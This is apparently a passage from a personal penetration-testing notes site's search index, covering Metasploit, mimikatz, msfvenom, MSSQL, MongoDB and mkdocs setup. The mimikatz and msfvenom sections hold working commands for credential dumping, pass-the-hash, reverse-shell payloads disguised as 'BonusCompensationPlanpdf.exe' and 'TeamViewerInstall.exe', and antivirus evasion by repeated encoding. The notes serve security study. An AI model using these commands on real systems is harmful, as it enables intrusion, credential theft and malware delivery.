                        msf6> help\n    Command        Description\n    -------        -----------\n    enumdesktops   List all accessible desktops and window stations\n    getdesktop     Get the current meterpreter desktop\n    idle time       Returns the number of seconds the remote user has been idle\n    keyboard_send  Send keystrokes\n    keyevent       Send key events\n    keyscan_dump   Dump the keystroke buffer\n    keyscan_start  Start capturing keystrokes\n    keyscan_stop   Stop capturing keystrokes\n    mouse          Send mouse events\n    screenshare    Watch the remote user's desktop in real-time\n    screenshot     Grab a screenshot of the interactive desktop\n    setdesktop     Change the meterpreters current desktop\n    uictl          Control some of the user interface components\n
                        ","tags":["pentesting"]},{"location":"metasploit/#metasploit-modules","title":"metasploit modules","text":"

                        Located at /usr/share/metasploit-framework/modules. They have the following structure:

                        <No.> <type>/<os>/<service>/<name>\n794   exploit/windows/ftp/scriptftp_list\n

                        If we do not want to use our web browser to search for a specific exploit within ExploitDB, we can use the CLI version, searchsploit.

                        searchsploit nagios3\n

                        How to download and install an exploit from exploitdb:

                        # Search for it from website or using searchsploit and download it. It should have .rb extension\nsearchsploit nagios3\n\n# The default directory where all the modules, scripts, plugins, and `msfconsole` proprietary files are stored is `/usr/share/metasploit-framework`. The critical folders are also symlinked in our home and root folders in the hidden `~/.msf4/` location. \n# Make sure that our home folder .msf4 location has all the folder structure that the /usr/share/metasploit-framework/. If not, `mkdir` the appropriate folders so that the structure is the same as the original folder so that `msfconsole` can find the new modules.\n\n# After that, we will be proceeding with copying the .rb script directly into the primary location.\n
                        ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryscannersmbsmb_login","title":"auxiliary/scanner/smb/smb_login","text":"

                        Use this to enumerate users and brute force passwords in a smb service.

                        ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryhttp_javascript_keylogger","title":"auxiliary/http_javascript_keylogger","text":"

                        It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.

                        ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherhasdump","title":"post/windows/gather/hasdump","text":"

                        Once you have a meterpreter session as system user, this module dumps all passwords.

                        ","tags":["pentesting"]},{"location":"metasploit/#windowsgatherarp-scanner","title":"windows/gather/arp-scanner","text":"

                        To enumerate IPs in a network interface

                        ","tags":["pentesting"]},{"location":"metasploit/#windowsgathercredentialswindows_autologin","title":"windows/gather/credentials/windows_autologin","text":"

                        This module extracts the plain-text Windows user login password in\u00a0 Registry. It exploits a Windows feature that Windows (2000 to 2008 R2) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location -\u00a0 HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable by all\u00a0 users.

                        ","tags":["pentesting"]},{"location":"metasploit/#postwindowsgatherwin_privs","title":"post/windows/gather/win_privs","text":"

                        This module tells you the privileges you have on the exploited machine.\u00a0

                        ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowslocalbypassuac","title":"exploit/windows/local/bypassuac","text":"

                        If getsystem command fails (in the meterpreter) because of a priv_elevated_getsystem error message, then use this module to bypass that restriction. You will get a new meterpreter session with the UAC policy disabled. Now you can run getsystem.use

                        ","tags":["pentesting"]},{"location":"metasploit/#postmultimanageshell_to_meterpretersessions","title":"post/multi/manage/shell_to_meterpretersessions","text":"

                        It upgrades your shell to a meterpreter

                        ","tags":["pentesting"]},{"location":"metasploit/#postmultireconlocal_exploit_suggester","title":"post/multi/recon/local_exploit_suggester","text":"

                        local exploit suggester module:

                        post/multi/recon/local_exploit_suggester\n
                        ","tags":["pentesting"]},{"location":"metasploit/#auxiliaryserversocks_proxy","title":"auxiliary/server/socks_proxy","text":"

                        This module provides a SOCKS proxy server that uses the builtin Metasploit routing to relay connections.

                        ","tags":["pentesting"]},{"location":"metasploit/#exploitwindowsfileformatadobe_pdf_embedded_exe","title":"exploit/windows/fileformat/adobe_pdf_embedded_exe","text":"

                        And also exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs To include malware into an adobe pdf

                        ","tags":["pentesting"]},{"location":"metasploit/#integration-of-metasploit-with-veil","title":"Integration of metasploit with veil","text":"

                        One nice thing about veil is that it provides a metasploit RC file, meaning that in order to launch the multihandler you just need to run:

                        msfconsole -r path/to/metasploitRCfile\n
                        ","tags":["pentesting"]},{"location":"metasploit/#ipmi-information-discovery","title":"IPMI Information discovery","text":"

                        See ipmi service on UDP/623. This module discovers host information through IPMI Channel Auth probes:

                        use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions ...actions... msf \nset ACTION < action-name > msf \nshow options \n# and set needed options\nrun\n
                        ","tags":["pentesting"]},{"location":"metasploit/#pmi-20-rakp-remote-sha1-password-hash-retrieval","title":"PMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

                        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.

                        use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION < action-name >\n\nshow options\n# set <options>\n\nrun\n
                        ","tags":["pentesting"]},{"location":"metasploit/#the-http_javascript_keylogger","title":"The http_javascript_keylogger","text":"

                        This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to \"test\", the following URL will load this script into the calling site: http://server:port/test/anything.js

                        use auxiliary/server/capture/http_javascript_keylogger\n
                        ","tags":["pentesting"]},{"location":"mimikatz/","title":"mimikatz","text":"

                        mimikatz is a tool made in C .

                        It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

                        Kiwi module in a meterpreter in metasploit is an adaptation of mimikatz.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#no-installation-portable","title":"No installation, portable","text":"

                        Download from github repo: https://github.com/gentilkiwi/mimikatz.

                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mimikatz/#basic-usage","title":"Basic usage","text":"
                        # Impersonate as NT Authority/SYSTEM (having permissions for it).\ntoken::elevate\n\n# List users and hashes of the machine\nlsadump::sam\n\n# Enable debug mode for our user\nprivilege::debug\n\n# List users logged in the machine and still in memory\nsekurlsa::logonPasswords full\n\n# Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we canuse cmd.exe to execute commands in the user's context. \n
                        ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"mitm-relay/","title":"mitm_relay","text":"

                        Hackish way to intercept and modify non-HTTP protocols through Burp & others with support for SSL and STARTTLS interception

                        This script is a very simple, quick and easy way to MiTM any arbitrary protocol through existing traffic interception software such as Burp Proxy or\u00a0Proxenet. It can be particularly useful for thick clients security assessments. It saves you from the pain of having to configure specific setup to intercept exotic protocols, or protocols that can't be easily intercepted. TCP and UDP are supported.

                        It's \"hackish\" in the way that it was specifically designed to use interception and modification capabilities of existing proxies, but for arbitrary protocols. In order to achieve that, each client request and server response is wrapped into the body of a HTTP POST request, and sent to a local dummy \"echo-back\" web server via the proxy. Therefore, the HTTP responses or headers that you will see in your intercepting proxy are meaningless and can be disregarded. Yet the dummy web server is necessary in order for the interception tool to get the data back and feed it back to the tool.

                        • The requests from client to server will appear as a request to a URL containing \"CLIENT_REQUEST\"
                        • The responses from server to client will appear as a request to a URL containing \"SERVER_RESPONSE\"

                        This way, it is completely asynchronous. Meaning that if the server sends responses in successive packets it won't be a problem.

                        To intercept only server responses, configure your interception rules like so:

                        \"Match and Replace\" rules can be used. However, using other Burp features such as repeater, intruder or scanner is pointless. That would only target the dummy webserver used to echo the data back.

                        The normal request traffic flow during typical usage would be as below:

                        ","tags":["windows","thick applications"]},{"location":"mitm-relay/#installation","title":"Installation","text":"

                        Download from GitHub - jrmdev/mitm_relay: Hackish way to intercept and modify non-HTTP protocols through Burp & others.

                        ","tags":["windows","thick applications"]},{"location":"mitm-relay/#requirements","title":"Requirements","text":"

                        1. mitm_relay requires python 3. Also to make sure that it doesn't have a conflict with pip module, we can use version 3.7.6. Download from: https://www.python.org/ftp/python/3.7.6/python-3.7.6-amd64.exe and install it. Once installed, restart the system.

                        2. Also, we can run in some problems like not having some modules installed, To get them installed, we would need to download getpip.py from https://github.com/amandaguglieri/python/blob/main/getpip.py

                        After installing pip, to install a module, run:

                        python -m pip install <nameofmodule>\n
                        ","tags":["windows","thick applications"]},{"location":"mmc-console/","title":"Microsoft Management Console (MMC)","text":"

                        You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system.

                        We can also open the MMC Console from a non-domain joined computer using the following command syntax:

                        runas /netonly /user:Domain_Name\\Domain_USER mmc\n

                        Now, you will have the MMC interface:

                        We can add any of the RSAT snap-ins and enumerate the target domain in the context of the target user sally.jones in the freightlogistics.local domain. After adding the snap-ins, we will get an error message that the \"specified domain either does not exist or could not be contacted.\" From here, we have to right-click on the Active Directory Users and Computers snap-in (or any other chosen snap-in) and choose Change Domain.

                        Type the target domain into the Change domain dialogue box, here freightlogistics.local. From here, we can now freely enumerate the domain using any of the AD RSAT snapins.

                        ","tags":["active directory","ldap","windows"]},{"location":"mobsf/","title":"Mobile Security Framework - MobSF","text":"

                        Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK, XAPK, IPA & APPX) along with others

                        ","tags":["mobile pentesting"]},{"location":"mobsf/#installation","title":"Installation","text":"
                        1. Install Git using below provided command in terminal
                        sudo apt-get install git\n
                        1. Install Python 3.8/3.9 using below provided command
                        sudo apt-get install python3.8**\n
                        1. Install latest version of JDK

                        Download from: https://www.oracle.com/java/technologies/javase-java-archive-javase6-downloads.html

                        Then:

                        chmod +x jdk-6u45-linux-x64.bin\nsh jdk-6u45-linux-x64.bin      \n

                        1. Install the required dependencies using below provided command
                        sudo apt install python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg62-turbo-dev zlib1g-dev wkhtmltopdf\n
                        1. Download MobSF using below provided command
                        git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git\n

                        Setup MobSF using command:

                        sudo ./setup.sh\n

                        Run!

                        ./run.sh 127.0.0.1:8000\n\n# Note: we can use any port number instead of **8000**, but it must be available\n

                        Access the MobSF web interface in browser using the URL: http://127.0.0.1:8000

                        ","tags":["mobile pentesting"]},{"location":"mongo/","title":"Mongo","text":"

                        By default, mongo uses TCP ports 27017-27018.

                        ","tags":["database","database","NoSQL"]},{"location":"mongo/#to-connect-to-a-mongodb","title":"To connect to a MongoDB","text":"

                        By default mongo does not require password. Admin is a common mongo database default admin user.

                        mongo $ip\nmongo <HOST>:<PORT>\nmongo <HOST>:<PORT>/<DB>\nmongo <database> -u <username> -p '<password>'\n

                        A collection is a group of documents in the database.

                        ","tags":["database","database","NoSQL"]},{"location":"mongo/#basic-usage","title":"Basic usage","text":"
                        # Enter in mongodb application\nmongo\n\n# See help\nhelp\n\n# Display databases\nshow dbs\n\n# Select a database\nuse <db>\n\n# Display collections in a database\nshow collections\n\n# Dump a collection\ndb.<collection>.find()\n\n# Return the number of records of the collection\ndb.<collection>.count() \n\n# Find in current db the username admin\ndb.current.find({\"username\":\"admin\"}) \n\n# Find in city collection all cities that matches the criteria (= MA) and return the count\ndb.city.find({\"city\":\"MA\"}).count() \n\n# How many cities of state \u201cIndiana\u201d have population greater than 15000 in collection \u201ccity\u201d in database \u201ccity\u201d?\ndb.city.find({$and:[{\"state\":\"IN\"}, {\"pop\":{$gt:15000}}]}).count()\n\n\n####################\n# Operators\n####################\n# Greater than: $gt\ndb.city.find({\"population\":{$gt:150000}}).count() \n\n# And operator: $and\ndb.city.find({$and:[{population:{$gt:150000}},{\"state\":\"FLORIDA\"}]})\n\n# Or operator: $or\ndb.city.find({$or:[{population:{$lt:1000}},{\"state\":\"FLORIDA\"}]})\n\n# Not equal operator: $ne\n# equal operator: $e\n\n# Additionally, you can use regex: Cities that starts with HA: \ndb.city.find({\"city\":{$regex:\"^HA.*\"}})\n\n# What is the name of 101st city in collection \u201ccity\u201d when sorted in ascending order according to \u201ccity\u201d in database \u201ccity\u201d?\ndb.city.find().sort({\"city\":1}).skip(100).limit(1)\n\n#####################\n# Operations\n#####################\n# Perform an average on an aggregate of documents\ndb.city.aggregate({\"$group\":{\"_id\":null, avg:{$avg:{\"$population\"}} }})\n\n\n# We can dump the contents of the documents present in the flag collection by using the db.collection.find() command. Let's replace the collection name flag in the command and also use pretty() in order to receive the output in a beautified format.\n
                        ","tags":["database","database","NoSQL"]},{"location":"moodlescan/","title":"moodlescan","text":"

                        my eval: I'm not sure about how accurate it is. I was working on the Goldeneye1 machine from vulnhub and moodlescan identied the moodle version as 2.2.2 when in reality is 2.2.3.

                        ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#installation","title":"Installation","text":"

                        Requirements: Install Python 3 and Install the package python3-pip

                        git clone https://github.com/inc0d3/moodlescan\ncd moodlescan\npip install -r requirements.txt\n
                        ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"moodlescan/#basic-commands","title":"Basic commands","text":"
                        python moodlescan.py -u [URL]\n\n\n#Options\n#       -u [URL]    : URL with the target, the moodle to scan\n#       -a      : Update the database of vulnerabilities to latest version\n#       -r      : Enable HTTP requests with random user-agent\n#       -k      : Ignore SSL Certificate\n#       Proxy configuration\n#\n#       -p [URL]    : URL of proxy server (http)\n#       -b [user]   : User for authenticate to proxy server\n#       -c [password]   : Password for authenticate to proxt server\n#       -d [protocol]  : Protocol of authentication: basic or ntlm\n
                        ","tags":["pentesting","web pentesting","cms","moodle"]},{"location":"msfvenom/","title":"msfvenom","text":"

                        MSFVenom is the successor of MSFPayload and MSFEncode, two stand-alone scripts that used to work in conjunction with msfconsole to provide users with highly customizable and hard-to-detect payloads for their exploits.

                        You can generate a webshell by using\u00a0 msfvenom

                        # List payloads\nmsfvenom --list payloads | grep x64 | grep linux | grep reverse\u00a0\u00a0\n\n# list all the available payloads\nmsfvenom -l payloads  \n

                        Also msfvenom can use metasploit payloads under \u201ccmd/unix\u201d to generate one-liner bind or reverse shells. List options with:

                        msfvenom -l payloads | grep \"cmd/unix\" | awk '{print $1}'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#some-flags","title":"Some flags","text":"
                        # -b, or --bad-chars: The list of characters to avoid example: '0'\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#staged-payload","title":"Staged payload","text":"
                        # Example of a linux staged payload\nmsfvenom -p linux/x64/shell/reverse_tcp lhost=192.66.166.2 lport=443 -f elf -o newfile\n\n# Example of a windows staged payload\nmsfvenom -p windows/x64/meterpreter/bind_tcp lhost=10.10.14.72 lport=1234 -f aspx -o lal\n

                        After that

                        chmod +x newfile\u00a0\n

                        When creating a staged payload, you will need to use a metasploit handler (exploit/multi/handler) in order to receive the shell connection as only metasploit contains proper logic that will send the rest of the payload to the connector . In that case, the metasploit payload has to be the same one as the MSFVenom one.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#stagedless-payload","title":"Stagedless payload","text":"

                        A stage less payload is a standalone program that does not need anything aditional (no metasploit connection), just the netcat listener on the computer.

                        # Example of a windows stageless payload\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe\n

                        If the AV was disabled all the user would need to do is double click on the file to execute and we would have a shell session.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-dll-file-with-a-webshell","title":"crafting a DLL file with a webshell","text":"

                        msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAttacker> LPORT=<4444> -a x86 -f dll > SECUR32.dll\n# -p: for the chosen payload\n# -a: architecture in the victim machine/application\n# -f: format for the output file\n
                        More about DLL highjacking in thick client applications.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#crafting-a-exe-file-with-shikata-ga-nai-encoder","title":"crafting a .exe file with Shikata Ga Nai encoder","text":"
                        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe\n\n# -e: chosen encoder \n

                        Shikata Ga Nai encoder will be most likely detected by AV and IDS/IPS. One better option would be to try running it through multiple iterations of the same Encoding scheme:

                        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe\n

                        But, still, we could be getting detected.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#module-msf-virustotal","title":"Module msf-virustotal","text":"

                        Alternatively, Metasploit offers a tool called msf-virustotal that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal.

                        msf-virustotal -k <API key> -f TeamViewerInstall.exe\n
                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#packers","title":"Packers","text":"

                        The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file. When run, the decompression code returns the backdoored executable to its original state, allowing for yet another layer of protection against file scanning mechanisms on target hosts. This process takes place transparently for the compressed executable to be run the same way as the original executable while retaining all of the original functionality. In addition, msfvenom provides the ability to compress and change the file structure of a backdoored executable and encrypt the underlying process structure.

                        A list of popular packer software:

                        UPX packer The Enigma Protector MPRESS Alternate EXE Packer ExeStealth Morphine MEW Themida

                        If we want to learn more about packers, please check out the PolyPack project.

                        ","tags":["pentesting","terminal","shells"]},{"location":"msfvenom/#mitical-attacks","title":"Mitical attacks","text":"Vulnerability Description MS08-067 MS08-067 was a critical patch pushed out to many different Windows revisions due to an SMB flaw. This flaw made it extremely easy to infiltrate a Windows host. It was so efficient that the Conficker worm was using it to infect every vulnerable host it came across. Even Stuxnet took advantage of this vulnerability. Eternal Blue MS17-010 is an exploit leaked in the Shadow Brokers dump from the NSA. This exploit was most notably used in the WannaCry ransomware and NotPetya cyber attacks. This attack took advantage of a flaw in the SMB v1 protocol allowing for code execution. EternalBlue is believed to have infected upwards of 200,000 hosts just in 2017 and is still a common way to find access into a vulnerable Windows host. PrintNightmare A remote code execution vulnerability in the Windows Print Spooler. With valid credentials for that host or a low privilege shell, you can install a printer, add a driver that runs for you, and grants you system-level access to the host. This vulnerability has been ravaging companies through 2021. 0xdf wrote an awesome post on it here. BlueKeep CVE 2019-0708 is a vulnerability in Microsoft's RDP protocol that allows for Remote Code Execution. This vulnerability took advantage of a miss-called channel to gain code execution, affecting every Windows revision from Windows 2000 to Server 2008 R2. Sigred CVE 2020-1350 utilized a flaw in how DNS reads SIG resource records. It is a bit more complicated than the other exploits on this list, but if done correctly, it will give the attacker Domain Admin privileges since it will affect the domain's DNS server which is commonly the primary Domain Controller. SeriousSam CVE 2021-36924 exploits an issue with the way Windows handles permission on the C:\\Windows\\system32\\config folder. Before fixing the issue, non-elevated users have access to the SAM database, among other files. This is not a huge issue since the files can't be accessed while in use by the pc, but this gets dangerous when looking at volume shadow copy backups. These same privilege mistakes exist on the backup files as well, allowing an attacker to read the SAM database, dumping credentials. Zerologon CVE 2020-1472 is a critical vulnerability that exploits a cryptographic flaw in Microsoft\u2019s Active Directory Netlogon Remote Protocol (MS-NRPC). It allows users to log on to servers using NT LAN Manager (NTLM) and even send account changes via the protocol. The attack can be a bit complex, but it is trivial to execute since an attacker would have to make around 256 guesses at a computer account password before finding what they need. This can happen in a matter of a few seconds.","tags":["pentesting","terminal","shells"]},{"location":"mssql/","title":"MSSQL - Microsoft SQL Server","text":"

                        Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications\u2014which may run either on the same computer or on another computer across a network. Wikipedia.

                        By default, MSSQL uses ports\u00a0TCP/1433\u00a0and\u00a0UDP/1434. \u00a0However, when MSSQL operates in a \"hidden\" mode, it uses the\u00a0TCP/2433\u00a0port.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-databases","title":"MSSQL Databases","text":"

                        MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

                        Default System Database Description master Tracks all system information for an SQL server instance model Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database msdb The SQL Server Agent uses this database to schedule jobs & alerts tempdb Stores temporary objects resource Read-only database containing system objects included with SQL server

                        Table source: System Databases Microsoft Doc and HTB Academy

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

                        MSSQL supports two authentication modes, which means that users can be created in Windows or the SQL Server:

                        • Windows authentication mode: This is the default, often referred to as integrated security because the SQL Server security model is tightly integrated with Windows/Active Directory. Specific Windows user and group accounts are trusted to log in to SQL Server. Windows users who have already been authenticated do not have to present additional credentials.
                        • Mixed mode: Mixed mode supports authentication by Windows/Active Directory accounts and SQL Server. Username and password pairs are maintained within SQL Server.
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#mssql-clients","title":"MSSQL Clients","text":"
                        • SQL Server Management Studio (SSMS) comes as a feature that can be installed with the MSSQL install package or can be downloaded & installed separately
                        • mssql-cli
                        • SQL Server PowerShell|
                        • HediSQL
                        • SQLPro
                        • Impacket's mssqlclient.py To locate it:
                        locate mssqlclient\n

                        Of the MSSQL clients listed above, pentesters may find Impacket's mssqlclient.py to be the most useful due to SecureAuthCorp's Impacket project being present on many pentesting distributions at install.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#database-configuration","title":"Database configuration","text":"

                        When an admin initially installs and configures MSSQL to be network accessible, the SQL service will likely run as NT SERVICE\\MSSQLSERVER. Connecting from the client-side is possible through Windows Authentication, and by default, encryption is not enforced when attempting to connect.

                        Authentication being set to Windows Authentication means that the underlying Windows OS will process the login request and use either the local SAM database or the domain controller (hosting Active Directory) before allowing connectivity to the database management system.

                        Misconfigurations to look at:

                        • MSSQL clients not using encryption to connect to the MSSQL server.
                        • The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates
                        • The use of named pipes
                        • Weak & default sa credentials. Admins may forget to disable this account
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#interact-with-mssql","title":"Interact with MSSQL","text":"","tags":["database","cheat sheet"]},{"location":"mssql/#from-linux","title":"From Linux","text":"

                        sqsh

                         sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#from-windows","title":"From Windows","text":"

                        sqlcmd

                        The\u00a0sqlcmd\u00a0utility lets you enter Transact-SQL statements, system procedures, and script files through a variety of available modes:

                        • At the command prompt.
                        • In Query Editor in SQLCMD mode.
                        • In a Windows script file.
                        • In an operating system (Cmd.exe) job step of a SQL Server Agent job.

                        Careful. In some environments the command GO needs to be in lowercase.

                        sqlcmd -S $IP -U username -P Password123\n\n\n# We need to use GO after our query to execute the SQL syntax. \n# List databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Use a database\nUSE dbName\ngo\n\n# Show tables\nSELECT table_name FROM dbName.INFORMATION_SCHEMA.TABLES\ngo\n\n# Select all Data from Table \"users\"\nSELECT * FROM users\ngo\n
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#gui-application","title":"GUI Application","text":"

                        mssql-cli, mssqlclient.py, dbeaver

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#sql-server-management-studio-or-ssms","title":"SQL Server Management Studio or SSMS","text":"

                        Only in windows. Download, install, and connect to database.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#dbeaver","title":"dbeaver","text":"

                        dbeaver is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

                        ","tags":["database","cheat sheet"]},{"location":"mssql/#mssqlclientpy","title":"mssqlclient.py","text":"

                        Alternatively, we can use the tool from Impacket with the name\u00a0mssqlclient.py.

                        mssqlclient.py -p 1433 <username>@$ip \n
                        ","tags":["database","cheat sheet"]},{"location":"mssql/#basic-commands","title":"Basic commands","text":"
                        # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo \n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure: \nSELECT is_srvrolemember(\u2018sysadmin\u2019)\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\n

                        Also, you might be interested in executing a cmd shell using xp_cmdshell by reconfiguring sp_configure.

                        ","tags":["database","cheat sheet"]},{"location":"my-mkdocs-material-customization/","title":"mkdocs","text":"

                        MkDocs is a static site generator for building project documentation. Documentation source files are written in Markdown, and configured with a single YAML configuration file.

                        I chose mkdocs to build the site because of its simplicity.

                        Link to site.

                        Some other options: hugo.

                        "},{"location":"my-mkdocs-material-customization/#my-install","title":"My install","text":"

                        Install a virtual environment such as virtualenvwrapper.

                        Create your virtual environment and activate it:

                        mkvirtualenv hackinglife\n\nworkon hackinglife\n

                        Install mkdocs. It's version 1.5.3. in my case:

                        pip install mkdocs==1.5.3\n

                        Install material theme for mkdocs:

                        pip install mkdocs-material\n

                        Install plugins such as glightbox:

                        pip install mkdocs-glightbox\n

                        Install plugins such as \"git-revision-date-localized\"

                        pip3 install mkdocs-git-revision-date-localized-plugin\n

                        Install plugins such as \"mkdocs-pdf-export\"

                        pip install mkdocs-pdf-export-plugin\n
                        "},{"location":"my-mkdocs-material-customization/#customizing-material-theme-pluggins-and-extensions","title":"Customizing Material theme: pluggins and extensions","text":"

                        Some plugins like \"mkdocs-glightbox\", \"mkdocs-git-revision-date-localized-plugin\", or \"mkdocs-pdf-export-plugin\", need to be added when the web app is deployed, so for that reason they are added at .github/workflow/doc.yml.

                        But some other pluggings just need to be added in the mkdocs configuration file (mkdocs.yml) like this:

                        markdown_extensions:\n    - extensionName\n
                        "},{"location":"my-mkdocs-material-customization/#admonition-extension","title":"Admonition extension","text":"

                        Source: https://squidfunk.github.io/mkdocs-material/reference/admonitions/

                        In mkdocs.yml:

                        markdown_extensions:\n    - admonition\n    - pymdownx.details \n    - pymdownx.superfences\n
                        "},{"location":"my-mkdocs-material-customization/#basic-syntax","title":"Basic syntax","text":"

                        Code in the document:

                        !!! note \"title\"\n\n    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod \n    nulla. \n

                        How it is seen:

                        title

                        Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla.

                        Admonitions follow a simple syntax: a block starts with\u00a0!!!, followed by a single keyword used as a\u00a0type qualifier. The content of the block follows on the next line, indented by four spaces

                        !!! <typeofchart> \"title\"\n

                        When\u00a0Details\u00a0is enabled and an admonition block is started with\u00a0???\u00a0instead of\u00a0!!!, the admonition is rendered as a collapsible block with a small toggle on the right side.

                        These are the type qualifier: note abstract info tip success question warning failure danger bug example quote

                        "},{"location":"my-mkdocs-material-customization/#content-tabs","title":"Content tabs","text":"

                        Source: https://squidfunk.github.io/mkdocs-material/reference/content-tabs/

                        In mkdocs.yml:

                        markdown_extensions:\n  - pymdownx.superfences\n  - pymdownx.tabbed:\n      alternate_style: true \n

                        Code in the document:

                        === \"Left\"\n    Content\n\n=== \"Center\"\n    Content\n\n=== \"Right\"\n    Content\n

                        How it is seen:

                        LeftCenterRight

                        Content

                        Content

                        Content

                        "},{"location":"my-mkdocs-material-customization/#data-tables","title":"Data tables","text":"

                        Source: https://squidfunk.github.io/mkdocs-material/reference/data-tables/#customization

                        In mkdocs.yml:

                         extra_javascript:\n      - https://unpkg.com/tablesort@5.3.0/dist/tablesort.min.js\n      - javascripts/tablesort.js\n

                        After applying the customization, data tables can be sorted by clicking on a column-. This is code in the document

                        Data table, columns sortable
                        | Method      | Description                          |\n| ----------- | ------------------------------------ |\n| `GET`       | Fetch resource  |\n| `PUT`       | Update resource |\n| `DELETE`    | Delete resource |\n

                        This is how it is seen:

                        Method Description GET Fetch resource PUT Update resource DELETE Delete resource"},{"location":"my-mkdocs-material-customization/#pdf-button-in-every-page","title":"PDF button in every page","text":"

                        Most of the existing plugins offer a print-all-in-one-file solution, which is not my intended development.

                        "},{"location":"my-mkdocs-material-customization/#mkdocs-pdf-export-plugin","title":"mkdocs-pdf-export-plugin","text":"

                        https://github.com/zhaoterryy/mkdocs-pdf-export-plugin

                        Install and add to gh-deploy workflow:

                        pip install mkdocs-pdf-export-plugin\n

                        mkdocs.yml

                        plugins:\n    - search\n    - pdf-export:\n        verbose: true\n        combined: false\n        media_type: print\n        enabled_if_env: ENABLE_PDF_EXPORT\n

